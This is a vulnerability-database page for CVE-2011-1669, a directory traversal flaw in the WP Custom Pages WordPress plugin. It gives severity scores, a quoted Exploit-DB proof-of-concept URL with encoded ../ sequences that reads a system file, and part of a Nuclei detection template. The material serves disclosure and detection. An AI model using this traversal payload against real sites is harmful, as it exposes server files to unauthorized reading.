CVE-2011-1669
published 2011-04-10CVE-2011-1669: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via…
PriorityP344medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
22.16%
97.4th percentile
Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mikoviny | wp_custom_pages | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Custom Pages 0.5.0.1 - Local File Inclusion
exploitdb·2011-04-05
CVE-2011-1669 WordPress Plugin Custom Pages 0.5.0.1 - Local File Inclusion
WordPress Plugin Custom Pages 0.5.0.1 - Local File Inclusion
---
Software................WordPress WP Custom Pages 0.5.0.1
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://wordpress.org/extend/plugins/wp-custom-pages/
Discovery Date..........4/3/2011
Tested On...............Windows Vista + XAMPP
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch
--PoC--
http://localhost/wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
Nuclei
WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
nuclei·CVSS 5.0
CVE-2011-1669 [MEDIUM] WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
Template:
id: CVE-2011-1669
info:
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
author: daffainfo
severity: medium
description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
impact: |
An attacker can read arbitrary files on the server, potentially leading to unauthorized access to sensitive information.
remediation: Upgrade to the latest versio
http://osvdb.org/71707http://secunia.com/advisories/43963http://www.autosectools.com/Advisories/WordPress.WP.Custom.Pages.0.5.0.1_Local.File.Inclusion_169.htmlhttp://www.exploit-db.com/exploits/17119http://www.securityfocus.com/bid/47146https://exchange.xforce.ibmcloud.com/vulnerabilities/66559http://osvdb.org/71707http://secunia.com/advisories/43963http://www.autosectools.com/Advisories/WordPress.WP.Custom.Pages.0.5.0.1_Local.File.Inclusion_169.htmlhttp://www.exploit-db.com/exploits/17119http://www.securityfocus.com/bid/47146https://exchange.xforce.ibmcloud.com/vulnerabilities/66559
2011-04-10
Published